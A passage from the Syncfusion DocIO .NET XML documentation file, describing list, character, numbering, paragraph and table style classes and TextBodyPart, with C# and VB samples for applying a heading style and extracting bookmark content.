        <member name="M:Syncfusion.DocIO.DLS.ListStyle.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.CreateDefListLevels(Syncfusion.DocIO.DLS.ListType)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.GetNearLevel(System.Int32)">
            <summary>
            Returns the <see cref="T:Syncfusion.DocIO.DLS.WListLevel"/> with the specified level number.
            </summary>
            <param name="levelNumber">The <b>integer </b> that specifies the level number.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WListLevel"/> instance at the specified level number.</returns>
            <exception cref="T:System.ArgumentOutOfRangeException">The level number cannot be less than zero.</exception>
            <remarks>When the specified level number is greater than the number of levels in the list, 
            then the last level in the list will be returned.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.CreateEmptyListLevels(System.Boolean)">
            <summary>
            
            </summary>
            <param name="listType"></param>
            <param name="isOneLevelList"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
            <param name="nextOwner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListStyle.Compare(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Compares list style with current list style.
            </summary>
            <param name="listStyle">The list style.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.ListID">
            <summary>
            Gets or sets the unique id for the list style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.Name">
            <summary>
            Gets or sets the name for the list style.
            </summary>
            <value>The <b>string</b> that represents the style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.ListType">
            <summary>
            Gets or sets the list type.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.ListType"/> member that specifies the list type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.Levels">
            <summary>
            Gets the collection of the levels in the list. Read-only.
            </summary>
            <value>The collection of list levels.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.StyleType">
            <summary>
            Gets the type of the list style. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/>member that specifies the type of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.IsHybrid">
            <summary>
            Gets or sets a value indicating whether this list style is hybrid multilevel/simple.
            </summary>
            <value>
            	if this instance is hybrid multilevel, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.IsSimple">
            <summary>
            Gets or sets a value indicating whether the list style is simple.
            </summary>
            <value>if this instance is simple, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.IsBuiltInStyle">
            <summary>
            Gets or sets a value indicating whether this instance is built in style.
            </summary>
            <value>
            	if this instance is built in style, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListStyle.BaseListStyleName">
            <summary>
            Gets or Sets the base list style identifier.
            </summary>
            <value>The base list style id.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WCharacterStyle">
            <summary>
            Represent a style of paragraph items.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterStyle.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCharacterStyle"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCharacterStyle.Clone">
            <summary>
            Clones the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/>, creating duplicate style.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterStyle.BaseStyle">
            <summary>
            Gets the base style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterStyle.StyleType">
            <summary>
            Gets the type of the style.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/>specifies the type of the style.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WListLevel">
            <summary>
            Represents a list level.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.Level1Str">
            <summary>
            List numbering strings 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.DEF_NUMBER_WORDS">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.DEF_TENS_WORDS">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_chFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_prFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_numberPrefix">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_numberSufix">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_layoutNumSuf">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_layoutNumPref">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_bulletChar">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_startAt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_alignment">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_patternType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_followChar">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_charOffset">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_legacySpace">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_legacyIndent">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_pStyle">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_picBullet">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_picButtetId">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListLevel.m_bFlags">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.#ctor(Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            
            </summary>
            <param name="listStyle"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.CreateLayoutData(System.String,System.Byte[],System.Int32)">
            <summary>
            Create level layout data
            </summary>
            <param name="numStr"></param>
            <param name="characterOffsets"></param>
            <param name="levelNumber"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.GetListItemText(System.Int32,Syncfusion.DocIO.DLS.ListType)">
            <summary>
            Gets list symbol for specified item index
            </summary>
            <param name="listItemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.CreateDefBulletLvl(System.Single,System.String,Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Create default bullet level.
            </summary>
            <param name="dxLeft"></param>
            <param name="str"></param>
            <param name="listStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.CreateDefNumberLvl(System.Int32,System.Int32,Syncfusion.DocIO.DLS.ListPatternType,Syncfusion.DocIO.DLS.ListNumberAlignment,Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Create default numbered level.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.GetNumberedItemText(System.Int32)">
            <summary>
            
            </summary>
            <param name="listItemIndex"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.GetAsWord(System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="number"></param>
            <param name="isOrdinal"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.GenerateNumber(System.Int32@,System.Int32,System.String)">
            <summary>
            
            </summary>
            <param name="value"></param>
            <param name="magnitude"></param>
            <param name="letter"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.Compare(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Compares List Level
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.RemoveGUID(System.String)">
            <summary>
            Removes the GUID appended with the style name
            </summary>
            <param name="styleName">The found style name</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListLevel.InitXDLSHolder">
            <summary>
            Serialize paragraph and character properties.
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.NumberAlignment">
            <summary>
            Gets or sets a <see cref="T:Syncfusion.DocIO.DLS.ListNumberAlignment"/> constant that represents the alignment for the list level of the list template.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.StartAt">
            <summary>
            Gets or sets the starting number for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.TabSpaceAfter">
            <summary>
            Gets or or sets the character inserted after the number for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.TextPosition">
            <summary>
            Gets or sets the position (in points) for the second line of wrapping text for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.NumberPrefix">
            <summary>
            Gets or sets the string inserted before the number for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.NumberSufix">
            <summary>
            Gets or sets the string inserted after the number for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.BulletCharacter">
            <summary>
            Gets or sets bullet character pattern for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.PatternType">
            <summary>
            Gets or sets a <see cref="T:Syncfusion.DocIO.DLS.ListPatternType"/> constant that represents the list pattern type for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.NoRestartByHigher">
             <summary>
            Gets or sets a value indicating whether to restart the level's number sequence based on higher (more significant) levels in the list.
             </summary>
             <value><b>True</b> then restart the level's number sequence based on higher (more significant) levels in the list; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.CharacterFormat">
            <summary>
            Gets the character formats of list symbol for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.ParagraphFormat">
            <summary>
            Gets or sets the paragraph format of the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.OwnerListStyle">
            <summary>
            Gets the owner list style.
            <exclude/>
            </summary>
            <value>The owner list style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.PreviousLevel">
            <summary>
            Gets previous list.
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.FollowCharacter">
            <summary>
            Gets or sets a <see cref="T:Syncfusion.DocIO.DLS.FollowCharacterType"/> constant that represents the type of character following the number text for the specified list.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.IsLegalStyleNumbering">
            <summary>
            Gets or sets a value indicating whether to turns all inherited numbers to ArabaicNumberFormat property.  The default is <b>false</b>.
            </summary>
            <value><b>True</b> then the level turns all inherited numbers to arabic; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.NumberPosition">
            <summary>
            Gets or sets the position (in points) of the number or bullet for the specified list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.UsePrevLevelPattern">
            <summary>
            Gets or sets a value indicating whether to include previous levels for generated number. The default is <b>false</b>.
            </summary>
            <value><b>True</b> number generated will include previous levels; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.Word6Legacy">
            <summary>
            Gets or sets a value indicating whether to use Word6 compatibility mode. The default is <b>false</b>.
            </summary>
            /// <value><b>True</b> to use Word6 compatibility mode; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.LegacySpace">
            <summary>
            Get/set level space value for Word6 compatibility mode.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.LegacyIndent">
            <summary>
            Get/set level indent value for Word6 compatibility mode.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.ParaStyleName">
            <summary>
            Gets or sets the name of the paragraph style.
            </summary>
            <value>The name of the paragraph style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.NoLevelText">
            <summary>
            Gets or sets a value indicating whether level has level text in list level formatting string.
            </summary>
            <value>if it has no level text, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.LevelNumber">
            <summary>
            Gets the number of the level.
            </summary>
            <value>The index of the level.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.PicBullet">
            <summary>
            Gets or sets a value indicating whether this instance has pic bullet.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.PicBulletId">
            <summary>
            Gets or sets the pic bullet id.
            </summary>
            <value>The pic bullet id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListLevel.PicIndex">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WNumberingStyle">
            <summary>
            Represents a style of Numbering
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WNumberingStyle.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraphStyle"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WNumberingStyle.Clone">
            <summary>
            Clones the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/>, creating duplicate style.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WNumberingStyle.CloneImpl">
            <summary>
            Clones itself.
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WNumberingStyle.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WNumberingStyle.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WNumberingStyle.ParagraphFormat">
            <summary>
            Gets paragraph format.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WNumberingStyle.BaseStyle">
            <summary>
            Gets a base style of paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WNumberingStyle.StyleType">
            <summary>
            Gets the type of the style.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/>member that specifies the type of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WNumberingStyle.ListFormat">
            <summary>
            Gets format of the list for the paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WNumberingStyle.ListIndex">
            <summary>
            Gets or sets the index of the list.
            </summary>
            <value>The index of the list.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WNumberingStyle.ListLevel">
            <summary>
            Gets or sets the list level.
            </summary>
            <value>The list level.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WParagraphStyle">
            <summary>
            Represents a style of paragraph. 
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Creates Paragraph styles.
                WParagraphStyle style = document.AddParagraphStyle("Heading 1") as WParagraphStyle;
                //Applies the base style.
                style.ApplyBaseStyle("Normal");
                //Applies character formats.
                style.CharacterFormat.FontName = "Calibri Light";
                style.CharacterFormat.FontSize = 16f;
                style.CharacterFormat.TextColor = System.Drawing.Color.FromArgb(46, 116, 181);
                //Applies paragraph formats.
                style.ParagraphFormat.BeforeSpacing = 12;
                style.ParagraphFormat.AfterSpacing = 0;
                style.ParagraphFormat.Keep = true;
                style.ParagraphFormat.KeepFollow = true;
                style.ParagraphFormat.OutlineLevel = OutlineLevel.Level1;
                //Add new paragraph
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                //Apply style
                paragraph.ApplyStyle("Heading 1");
                paragraph.AppendText("Applying paragraph style");
                //Save and close the Word document
                document.Save("Sample1.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Creates Paragraph styles.
                Dim style As WParagraphStyle = TryCast(document.AddParagraphStyle("Heading 1"), WParagraphStyle)
                'Applies the base style.
                style.ApplyBaseStyle("Normal")
                'Applies character formats.
                style.CharacterFormat.FontName = "Calibri Light"
                style.CharacterFormat.FontSize = 16.0F
                style.CharacterFormat.TextColor = System.Drawing.Color.FromArgb(46, 116, 181)
                'Applies paragraph formats.
                style.ParagraphFormat.BeforeSpacing = 12
                style.ParagraphFormat.AfterSpacing = 0
                style.ParagraphFormat.Keep = True
                style.ParagraphFormat.KeepFollow = True
                style.ParagraphFormat.OutlineLevel = OutlineLevel.Level1
                'Add new paragraph
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                'Apply style
                paragraph.ApplyStyle("Heading 1")
                paragraph.AppendText("Applying paragraph style")
                'Save and close the Word document
                document.Save("Sample1.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraphStyle.m_prFormat">
            <summary>
            Member that specifies the paragraph format.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraphStyle.m_listFormat">
            <summary>
            Member that specifies the list format.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraphStyle"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.ApplyBaseStyle(System.String)">
            <summary>
            Applies the base style for the current paragraph style.
            </summary>
            <param name="styleName">The name of the style to be applied.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.Clone">
            <summary>
            Creates a duplicate copy of the style.
            </summary>
            <returns>The reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.Compare(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Compares the properties of current paragraph style with specified style.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.ApplyBaseStyle(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Applies base style for current style.
            </summary>
            <param name="baseStyle">The base style</param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An <see cref="T:System.Object"/> reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphStyle.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphStyle.ParagraphFormat">
            <summary>
            Gets the formatting of paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraphFormat"/> instance that specifies the paragraph format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphStyle.BaseStyle">
            <summary>
            Gets the base style of the paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraphStyle"/> instance that specifies the base style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphStyle.StyleType">
            <summary>
            Gets the type of the style. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/> member that specifies the type of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphStyle.ListFormat">
            <summary>
            Gets the format of the list for the paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WListFormat"/> instance that specifies the list format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphStyle.ListIndex">
            <summary>
            Gets or sets the index of the list.
            </summary>
            <value>The index of the list.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphStyle.ListLevel">
            <summary>
            Gets or sets the list level.
            </summary>
            <value>The list level.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTableStyle">
            <summary>
            Represents a style of <see cref="T:Syncfusion.DocIO.DLS.WTable"/>. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableStyle.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the WTableStyle class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableStyle.ConditionalFormat(Syncfusion.DocIO.DLS.ConditionalFormattingCode)">
            <summary>
            Create conditional formatting style for current style.
            </summary>
            <param name="conditionCode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableStyle.ApplyBaseStyle(System.String)">
            <summary>
            Apply base style for current style.
            </summary>
            <param name="styleName">The <b>string</b> that specifies the style name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableStyle.Clone">
            <summary>
            Creates a duplicate copy of the style.
            </summary>
            <returns>The reference to the newly created style.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableStyle.ApplyBaseStyle(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Applies base style for current style.
            </summary>
            <param name="baseStyle">The base style</param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableStyle.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An object that can be casted as <see cref="T:Syncfusion.DocIO.DLS.WTableStyle"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableStyle.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.ParagraphFormat">
            <summary>
            Gets the paragraph format.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraphFormat"/> object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.ListFormat">
            <summary>
            Gets the list format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.CellProperties">
            <summary>
            Gets cell properties.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.RowProperties">
            <summary>
            Gets row properties.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.TableProperties">
            <summary>
            Gets table properties.
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.BaseStyle">
            <summary>
            Gets base style of the current style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.StyleType">
            <summary>
            Gets the type of the style.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/>member that specifies the type of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableStyle.ConditionalFormattingStyles">
            <summary>
            Gets conditional formatting styles collection of the table style.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextBodyPart">
            <summary>
            Represents the part of the text body items.
            </summary>
            <example>
            <code language = "C#">
            WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
            //Create the bookmark navigator instance to access the bookmark
            BookmarksNavigator bookmarkNavigator = new BookmarksNavigator(document);
            //Move the virtual cursor to the before the end location of the bookmark "Northwind"
            bookmarkNavigator.MoveToBookmark("Northwind");
            //Get the bookmark content as a text body part.
            TextBodyPart part = bookmarkNavigator.GetBookmarkContent();            
            //Convert the textbody part as a separate Word document.
            WordDocument new_document = part.GetAsWordDocument();
            //Save and close the document
            new_document.Save("Sample.docx", FormatType.Docx);
            document.Close();
            </code>
            <code language = "VB">
            Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
            'Create the bookmark navigator instance to access the bookmark
            Dim bookmarkNavigator As New BookmarksNavigator(document)
            'Move the virtual cursor to the before the end location of the bookmark "Northwind"
            bookmarkNavigator.MoveToBookmark("Northwind")
            'Get the bookmark content as a text body part.
            Dim part As TextBodyPart = bookmarkNavigator.GetBookmarkContent()
            'Convert the textbody part as a separate Word document.
            Dim new_document As WordDocument = part.GetAsWordDocument()
            'Save and close the document
            new_document.Save("Sample.docx", FormatType.Docx)
            document.Close()
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.#ctor(Syncfusion.DocIO.DLS.TextBodySelection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> class with the 
            specified <see cref="T:Syncfusion.DocIO.DLS.TextBodySelection"/>.
            </summary>
            <param name="textBodySelection">The <see cref="T:Syncfusion.DocIO.DLS.TextBodySelection"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.#ctor(Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>.
            </summary>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.Clear">
            <summary>
            Clears the text body items.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodyPart.Copy(Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Copies the text from the specified <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> 
            and adds the text as new paragraph in the document.
            </summary>
            <param name="textSel">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> to copy the text.</param>
        </member>
